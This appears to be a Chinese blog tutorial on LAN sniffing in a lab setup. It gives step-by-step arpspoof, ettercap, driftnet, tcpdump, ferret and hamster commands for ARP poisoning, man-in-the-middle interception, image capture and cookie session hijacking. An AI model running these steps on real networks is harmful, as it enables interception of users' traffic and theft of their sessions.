局域网嗅探

受害方:172.21.22.2
kali攻击方:172.21.230.72
在这里插入图片描述

断网攻击(中间人攻击)

受害者可上网
在这里插入图片描述

开始攻击
arpspoof -i eth0 -t 172.21.22.2 172.21.1.1
-i : 指定网卡
-t :指定攻击目标
最后是网关
在这里插入图片描述

在这里插入图片描述
查看arp缓存,已被投毒
在这里插入图片描述
arp -d 清除arp缓存

嗅探

开启中间人欺骗

ettercap -i eth0 -TqM arp:remote /172.21.22.2// /172.21.1.1//
-i 指定网卡
-M ARP欺骗
-T, –text #文本模式显示
-q, –quiet #安静模式,不显示嗅探数据
172.21.22.2 受害方
172.21.1.1 网关
在这里插入图片描述

捕获图片

driftnet -i eth0 -a -d ./picture
-i 指定网卡
-a :后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)
-d directory :指定保存图片的路径
./picture 保存到本地picture文件夹
在这里插入图片描述

cookie会话劫持

这次使用arpspoof来实现中间人攻击
使用前先开启流量转发,这里不解释,很基础的东西

echo 1 > /proc/sys/net/ipv4/ip_forward 
cat /proc/sys/net/ipv4/ip_forward  

在这里插入图片描述

arpspoof -i eth0 -t 172.21.22.2 172.21.1.1
-i : 指定网卡
-t :指定攻击目标
最后是网关
还是这种攻击,不够受害者的流量都经过攻击方转发转发出去了
在这里插入图片描述

抓取数据包
tcpdump -i eth0 -w ./cookie.pcap

在这里插入图片描述

ferret -r cookie.pcap
生成hamster.txt
保存到hamster同目录,或者直接设置环境变量
在这里插入图片描述

下载hamsterhttp://http.kali.org/pool/main/h/hamster-sidejack/
直接运行hamster
访问http://hamster或http://127.0.0.1:1234
成功劫持

在这里插入图片描述

  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值